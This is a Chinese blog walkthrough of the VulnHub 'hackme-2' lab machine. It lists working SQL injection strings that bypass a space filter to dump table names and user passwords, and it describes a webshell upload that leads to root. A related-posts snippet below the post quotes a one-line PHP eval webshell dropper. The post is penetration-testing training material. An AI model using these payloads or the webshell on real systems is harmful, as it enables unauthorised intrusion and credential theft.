HACKME-2 打靶

于 2023-06-16 22:46:07 发布
阅读量71 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57315671/article/details/131248288
版权

靶机描述:靶机地址:https://www.vulnhub.com/entry/hackme-2,618/

开启一台kali作为攻击机,将两台机子均设为NAT模式

一.信息收集

1.主机发现

arp-scan -l

 经过比对mac地址得出靶机IP为192.168.239.165

2.端口扫描

3.目录扫描

二. 实战

SQL注入

1.进入主页发现是登录页面,且可以注册用户

2. 注册用户,admin,密码为123456

3.登录

4. 尝试sql手工注入

a%'/**/and/**/length(database())>1#

尝试union联合注入 

a%'/**/union/**/select/**/1,2,3#

获取数据库名等基本信息

x%'/**/union/**/select/**/user(),database(),version()#

 

获取表名

x%'/**/union/**/select/**/TABLE_NAME,2,3/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=database()#

 

获取列名

x%'/**/union/**/select/**/column_name,2,3/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_SCHEMA=database()/**/and/**/TABLE_NAME='users'#

 

获取表信息

x%'/**/union/**/select/**/user,pasword,3/**/from/**/users#

解密密码

 

超级管理员用户superadmin的密码为Uncrackable

超级管理员登录,发现有文件上传点

 5.上传文件并改后缀

 6.浏览器访问 空白页面说明上传成功

 7.kali开启监听

8.蚁剑连接成功

 

9. 蚁剑终端

10.获得root

 

 

 

墨小洋@
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
地空战-打靶游戏.rar
04-07
地空战-打靶游戏.rar
Vulnhub--hackme2
weixin_45168704的博客
06-12 142
拿下hackme2
靶机渗透 HACKME-2 (详细渗透,适合新手渗透)
君莫hacker的博客
09-06 3482
靶机HACKME:2的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘三、 漏洞利用四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-2,618/ 作者 x4bx54 发布日期 2020年12月6日 难度 中等 靶机基本介绍: hackme2”是一个中等难度的关卡。这是hackme系列的第二部分,其中有更多的控件用于阻止恶意攻击。此外,你还必须跳出框框来利
hackme-2靶机渗透详解
大熊
06-12 329
这个靶机的难度适中,通过这个靶机的联系,感觉更可以增强自己对这些漏洞执行的连贯性,靶机主要考察了目录扫描,sql注入(这里要绕过空格过滤),文件上传与命令执行的结合,反弹shell及提权。该靶机可以串通各部分知识,值得一做。
hackme-2
qq_45747465的博客
06-12 108
打靶--hackme-2
Hackme2靶机总结
qq_45301512的博客
12-17 341
(2) 先用最普通的测post的跑一下,发现不行,根据最后的提示,可以加上 –level 参数 和 –tramper=space2comment 参数。看了网上的答案,发现/home/legacy下存在一个touchmenot可执行文件,运行就能提权。使用msfvenom生成一个php的tiquan.php,上传到/var/www/html目录下。=eval 代替
35--[打靶游戏].zip源码scratch2.0 3.0编程项目源文件源码案例素材源代码
04-17
35--[打靶游戏].zip源码scratch2.0 3.0编程项目源文件源码案例素材源代码35--[打靶游戏].zip源码scratch2.0 3.0编程项目源文件源码案例素材源代码35--[打靶游戏].zip源码scratch2.0 3.0编程项目源文件源码案例素材源...
易语言地空战-打靶游戏
07-17
易语言地空战-打靶游戏源码,地空战-打靶游戏
一起打靶-Breach-2-final2.1.xss上线
最新发布
09-28
一起打靶-Breach-2-final2.1.xss上线
大数据-算法-激光打靶多路数据采集处理系统.pdf
04-16
大数据-算法
Vulnhub-hackme2
GALi_233的博客
03-20 3884
Description ‘hackme2’ is a medium difficulty level box. This is the second part of the hackme series where more controls are in place do deter malicious attacks. In addition, you will have to think out of the box to exploit the vulnerabilites. The goal is
vulnhub靶场之hackme2-DCHP
weixin_42478365的博客
06-04 694
sql注入(空格绕过),命令执行漏洞(空格绕过)、SUID提权、Burp联动xray
vulhub靶场学习日记hackme2
m0_55763479的博客
07-12 296
vulhub靶场学习日记hackme2
vulnbuh-hackme2
weixin_44533592的博客
03-27 660
vulnbuh-hackme2靶机 环境 目标主机ip 192.168.10.147 攻击机 kali 192.168.143 ​ 物理机 windows 信息收集 对目标主机进行端口扫描 nmap -sS -A 192.168.10.147 开放端口 22和80 访问目标主机80 一个登录页面 注册并登录 一个搜索框 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-EaDdH7WZ-1616833716185)(C:\Users\zhang\AppData\Ro
vulnhub--hackme2-DHCP
weixin_45922278的博客
02-24 883
描述 “ hackme2”是中等难度级别的框。这是hackme系列的第二部分,其中更多的控制措施可以阻止恶意攻击。此外,您还必须开箱即用,以利用漏洞。目标是通过Web漏洞获得受限的特权访问,然后特权以root用户身份升级。该实验室的创建是为了模拟现实世界中的网络漏洞。 “ hackme2”使用DHCP并可能在mysqld自行关闭(非常罕见的情况)的情况下,尝试强制重启机器,并且随后应能正常工作。 https://idc.wanyunshuju.com/vul/1947.html 一、信息...
靶机渗透练习14-hackme2
hirak0的博客
04-15 993
靶机描述 靶机地址:https://www.vulnhub.com/entry/hackme-2,618/ Description ‘hackme2’ is a medium difficulty level box. This is the second part of the hackme series where more controls are in place do deter malicious attacks. In addition, you will have to think ou
Hackme Writeup
热门推荐
wywwzjj
05-21 1万+
https://wywwzjj.top/2019/02/02/Hackme-Writeup/ hide and seek Can you see me? I’m so close to you but you can’t see me. 这题查看源码即可。 guestbook This guestbook sucks. sqlmap is your friend. 既然提示有 sqlmap...
漏洞payload 靶机_hackme:2 靶机攻略
weixin_42354108的博客
01-16 1035
原标题:hackme:2 靶机攻略 0x01 背景:hackme:2是vulnhub上的一个medium难度的CTF靶机,难度适中、内容丰富,贴近实战。而且没有太多的脑洞,适合安全工作者们用来练习渗透测试,然而唯一的缺憾是目前没有公开的攻略,因此把个人的通关过程记录于此,作为攻略分享给大家!0x02 技术关键词:SQL注入、WAF Bypass、模糊测试、文件上传、suid提权0x03 靶机发现与...
edjpgcom制作一句话图片木马
刘启明
06-19 6833
将图片直接拖到edjpgcom.exe程序上 写入一句话木马 <?fputs(fopen("shell1.php","w"),'<?php @eval($_POST[caidao]);?>')?> 查看图片
蒙特卡洛打靶matlab
05-12
蒙特卡洛打靶是一种常用的数值模拟方法,可以用来估计某个过程的概率分布或期望值。在打靶问题中,我们需要估计一个枪手打中靶心的概率。 下面是使用 Matlab 实现蒙特卡洛打靶的代码示例: ```matlab % 定义打靶...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值